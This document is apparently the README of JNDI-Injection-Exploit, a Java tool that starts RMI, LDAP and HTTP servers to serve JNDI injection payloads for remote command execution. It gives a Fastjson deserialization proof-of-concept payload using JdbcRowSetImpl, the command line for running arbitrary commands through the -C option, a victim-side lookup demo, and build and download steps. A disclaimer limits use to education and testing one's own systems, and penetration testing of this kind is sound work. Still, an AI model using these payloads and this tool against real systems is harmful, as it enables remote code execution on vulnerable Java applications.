JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.
Using this tool allows you get JNDI links, you can insert these links into your POC to test vulnerability.
For example, this is a Fastjson vul-poc:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}
We can replace “rmi://127.0.0.1:1099/Object” with the link generated by JNDI-Injection-Exploit to test vulnerability.
All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.
Run as
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
where:
(optional , default command is “open /Applications/Calculator.app”)
(optional , default address is the first network interface address)
Points for attention:
or you can change the default port in the run.ServerStart class line 26~28.
so you need to ensure your command is workable in method exec().
Command in bash like “bash -c …” need to add Double quotes.
Local demo:
Start the tool like this:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “open /Applications/Calculator.app” -A “127.0.0.1”
Screenshot:
In this example, it looks like this:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1/fgf4fp");
}
then when we run this code, the command will be executed ,
and the log will be printed in shell:
We can select one of the two methods to get the jar.
Download the latest jar from Realease.
Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit
$ mvn clean package -DskipTests
github.com/mbechler/marshalsec
github.com/welk1n/JNDI-Injection-Bypass
github.com/welk1n/JNDI-Injection-Exploit
github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/1.png
github.com/welk1n/JNDI-Injection-Exploit/blob/master/screenshots/2.png
github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar